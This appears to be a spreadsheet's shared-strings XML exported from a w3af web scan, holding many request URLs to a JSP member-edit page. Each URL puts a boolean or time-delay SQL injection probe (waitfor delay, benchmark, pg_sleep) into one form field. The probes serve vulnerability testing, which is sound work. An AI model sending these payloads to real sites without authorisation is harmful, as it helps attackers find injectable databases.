    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1';waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1');waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+benchmark(2500000,md5(1))&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+pg_sleep(5)&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+pg_sleep(5)+or+"1"="1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71"+or+"71"="71&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=71"+and+"71"="72&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=71'+or+'71'='71&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=71'+and+'71'='72&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=71+or+71=71+&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=71+and+71=72+&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1;waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1);waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1';waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1');waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+benchmark(2500000,md5(1))&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+pg_sleep(5)&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+pg_sleep(5)+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+pg_sleep(5)+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=21"+or+"21"="21&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=21"+and+"21"="22&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=21'+or+'21'='21&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=21'+and+'21'='22&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=21+or+21=21+&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=21+and+21=22+&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1;waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1);waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1));waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1';waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1');waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1'));waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1+or+benchmark(2500000,md5(1))&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1+or+pg_sleep(5)&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1'+or+pg_sleep(5)+or+'1'='1&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1"+or+pg_sleep(5)+or+"1"="1&amp;provincia=0&amp;login=56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88"+or+"88"="88&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=88"+and+"88"="89&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=88'+or+'88'='88&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=88'+and+'88'='89&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=88+or+88=88+&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=88+and+88=89+&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1;waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1);waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1));waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1';waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1');waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'));waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+benchmark(2500000,md5(1))&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+pg_sleep(5)&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+pg_sleep(5)+or+'1'='1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+pg_sleep(5)+or+"1"="1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=59"+or+"59"="59&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=59"+and+"59"="60&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=59'+or+'59'='59&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=59'+and+'59'='60&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=59+or+59=59+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=59+and+59=60+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=1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0&amp;login=1)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0&amp;login=1))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0&amp;login=1'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0&amp;login=1')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0&amp;login=1'))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0&amp;login=1+or+benchmark(2500000,md5(1))&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=1+or+pg_sleep(5)&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=1'+or+pg_sleep(5)+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=1"+or+pg_sleep(5)+or+"1"="1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8"+or+"8"="8&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=8"+and+"8"="9&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=8'+or+'8'='8&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=8'+and+'8'='9&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=8+or+8=8+&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=8+and+8=9+&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1;waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1);waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1';waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1');waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+benchmark(2500000,md5(1))&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
